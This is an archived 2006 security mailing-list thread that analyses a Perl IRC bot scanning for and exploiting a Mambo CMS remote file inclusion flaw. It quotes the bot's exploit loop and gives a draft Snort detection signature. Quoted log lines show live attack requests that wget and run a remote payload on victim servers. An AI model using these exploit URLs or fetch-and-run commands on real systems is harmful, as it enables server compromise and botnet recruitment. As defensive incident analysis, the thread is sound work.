Security Incidents mailing list archives
Re: High volume of Mambo scans (perlb0t)
From: "Jamie Riden" <jamesr () europe com>
Date: Mon, 15 May 2006 11:34:35 +1200
Seems to have some kind of google search code for the particular vulnerability - haven't seen this before: if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {^M sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");^M srand;^M my $itime = time;^M my ($cur_time);^M my ($exploited);^M $boturl=$2;^M $cur_time = time - $itime;$exploited = 0;^M while($1>$cur_time){^M $cur_time = time - $itime;^M @urls=fetch();^M foreach $url (@urls) {^M sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Trying to exploit ".$url);^M $cur_time = time - $itime;^M my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;^M $url =$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";^M $page = http_query($url);^M $exploited = $exploited + 1;^M }^M }^M sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");^M This is a quick stab at a snort sig: alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80 (msg: "BLEEDING-EDGE perlb0t Bot Reporting Scan/Exploit"; flow: to_server,established; content:"PRIVMSG|20|"; nocase; within: 80; tag: session, 20, packets; pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i"; within:16; pcre:"/(Exploiting|Exploited}Attacking|Scanning|perlb0t)/i"; classtype: trojan-activity; sid: xxxx; rev:1; ) but I'm sure this could be improved. cheers, Jamie On 15/05/06, Jamie Riden <jamesr () europe com> wrote:
Looks like some sort of shellbot wanting to connect to an IRC channel #abusers on abuser.hacked.in:8080. I've been seeing occaisonal probes for Mambo's index.php on and off for a while now - the first part is similar to http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the payloads are slightly different, though it always seems to end up with an IRC bot of some kind. I usually see them coupled with scans for coppermine and other remote include issues, plus xmlrpc probes. I think you're seeing an attempt to exploit issue#3 here - http://secunia.com/advisories/18935/ cheers, Jamie On 14/05/06, Daniel Cid <danielcid () yahoo com br> wrote: > Since Thursday night I'm seeing a high volume of scans > on different web servers for possibly the following > vulns: > > http://secunia.com/advisories/14337/ > http://www.osvdb.org/displayvuln.php?osvdb_id=10180 > > > However, they say the problem is on function.php and > I'm seeing them on index.php. Can anyone confirm that? > > Some log samples: > > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? > HTTP/1.0" 404 167 "-" "Mozilla/5.0" -- Jamie Riden / jamesr () europe com / jamie.riden () computer org NZ Honeynet project - http://www.nz-honeynet.org/
-- Jamie Riden / jamesr () europe com / jamie.riden () computer org NZ Honeynet project - http://www.nz-honeynet.org/
Current thread:
- Re: High volume of Mambo scans (perlb0t) Jamie Riden (May 14)
- Re: High volume of Mambo scans (perlb0t) Daniel Cid (May 15)
- Re: High volume of Mambo scans (perlb0t) Yuri Slobodyanyuk (May 15)
- Re: High volume of Mambo scans (perlb0t) Peter Kosinar (May 15)
- Re: High volume of Mambo scans (perlb0t) Daniel Cid (May 15)